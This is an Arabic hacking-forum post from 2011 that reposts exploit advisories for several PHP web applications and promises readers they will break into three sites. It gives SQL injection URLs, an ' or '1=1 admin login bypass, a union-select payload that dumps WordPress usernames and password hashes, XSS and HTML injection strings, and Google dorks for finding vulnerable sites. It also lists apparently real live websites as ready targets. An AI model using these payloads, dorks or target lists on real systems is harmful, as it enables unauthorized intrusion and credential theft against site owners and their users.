| b10001 | 07-30-2011 07:26 PM |
[حصري]اقوى الثغرات لسكريبتات مشهوورة هنا.. ادخل وستخرج مخترق ثلاث مواقع
كود PHP:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm kalashinkov3 member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#########################################################
# Title : CyberScribe SQL-I & (admin) Auth ByPass Vulnerability
# Author: Kalashinkov3
# Home : 13000 / ALGERIA
# Vendor: [www.cyberscribeweb.com]
# Email : kalashinkov3[at]Hotmail[dot]Fr
# Date : 13/06/2011
# Google Dork : intext:"Site by CyberScribe Web Solutions"
# Category : PHP [SQli]
#########################################################
[+] Exploit SQL-i
# http://[localhost]/index.php?action=page&page_id='1
# http://[localhost]/index.php?action=page&page_id=[SQLi]
# http://[localhost]/ecouragement.php?action=show&id='1
# http://[localhost]/ecouragement.php?action=show&id=[SQLi]
[+] Admin Page (Bypass)
# http://[localhost]/admin.php
Username: ' or '1=1
Password: ' or '1=1
^_^ G00d LUCK ALL :=)
كود PHP:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Title : AMHSHOP 3.7.0 SQL Injection
[+] Name : AMHSHOP 3.7.0
[+] Affected Version : v3.7.0
[+] Description : it's an arabic Shopping Script [Payable]
[+] Software : http://amhserver.com/37/ & http://www.metjar.com/
[+] Tested on : (L):Vista & Windows Xp and Windows 7
[+] Dork : Powered by AMHSHOP 3.7.0
[+] Date : 14/06/2011
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : Yassin Aboukir
[+] Contact : 01Xp01@Gmail.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=********.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=********.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>
[+] Site : http://www.yaboukir.com
[+] Greetz : Th3 uNkn0wnS Team ! & All My friends
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Error:
MySQL
* Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''users_login_forgotpassword'' AND user_id = '' LIMIT 1' at line 1
* Error Number:1064
* SQL: SELECT restricted FROM userspermission WHERE page = 'users_login_forgotpassword'' AND user_id = '' LIMIT 1
# we had contacted the owner before and some websites have fixed the bug ;)
[-] Exploit:-
# http://[localhost]/Path/admin/index.php?module=users&page=login&event=[SQL]
# http://[localhost]/Path/admin/index.php?module=users&page=login&event=forgotpassword'
G00D LUCK ALL :)
كود PHP:
#############################################
# r00t-s3cur1ty cr3w (rS) #
# HaNniBaL KsA - Dr.Silver - MR.DH #
#############################################
# HK@rS:~# ./rS #
#############################################
#
# Title : WordPress plugin photoracer Multi Vulnerability
# Vendor : http://www.dhzgw.com
# Author : HaNniBaL KsA (HK)
# Team : r00t-s3cur1ty cr3w (rS)
# E-mail : B9n@hotmail.com
# Home : tryag.cc (TRYAG ) & p0c.cc (Proof Of Concepts | P0C Team)
# Twitter : twitter.com/r00t_s3cur1ty
# Date : 05-22-2011
# GooGle Dork : inurl:"wp-content/plugins/photoracer/viewimg.php?id="
#
#-------------------------------------------------------------------------
#
# [+] Exploit'z :
#
# (1) SQL :
# [~] http://site/path/wp-content/plugins/photoracer/viewimg.php?id=[SQL]
# E.X:
# [-] http://site/path/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
#
# [NOTE!] => PAGE LOGIN : http://[site]/wp-login.php
#
# (2) XSS :
# [~] http://site/path/wp-content/plugins/photoracer/viewimg.php?id=[XSS]
# E.X:
# [-] http://site/path/wp-content/plugins/photoracer/viewimg.php?id=***************(1337);</script>
#
#
#
# (3) Html Injection:
# [~] http://site/path/wp-content/plugins/photoracer/viewimg.php?id=[HTML]
# E.X:
# [-] http://site/path/wp-content/plugins/photoracer/viewimg.php?id=<h4>HK@rS<h4>
#
#-------------------------------------------------------------------------
كود PHP:
‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡
[+] Exploit Title : ebusinesslook.. SQL injection Vulnerability
[+] Date : 10 June 2011
[+] Author : k's0uR!
[+] Category : WebApps
[+] d0rk : "Design and Developed by ebusinesslook"[Or]"Developed by eBusinesslook"
[+] Faceb00k : http://www.facebook.com/dali.Developpeur
[+] Tested on : Windows Xp SP2
‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡
[+] Exploit:
››http://localhost/index.php?id={VaLid id }
››http://localhost/index.php?id=1' » {sql Error} (^_^)
››http://localhost/index.php?id= SQL here
...
›› admin page:
›› http://localhost/admin/ (*_*)
‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡
[+] Example:
››http://www.constructioncommonsense.com/index.php?id=2'
››http://www.transuniontruck.com/index.php?id=6'
››http://groverservicecentre.com/index.php?id=4'
http://www.techvibes.com/public/cach..._255255255.jpg http://www.sptechs.com/UserFiles/fis...AMHSHOP_ar.gif http://widgets.markosweb.com/w/big/e...sslook.com.gif http://evbdn.eventbrite.com/s3-s3/ev...17158527-1.jpg http://www.id-3.net/wp-content/uploa...press-logo.png تحذير :grrrrrr:؛ حلفتكم بلله لا تقتربو من المواقع العربية
لوول
:rules:
:grrrrrr:
:122: |
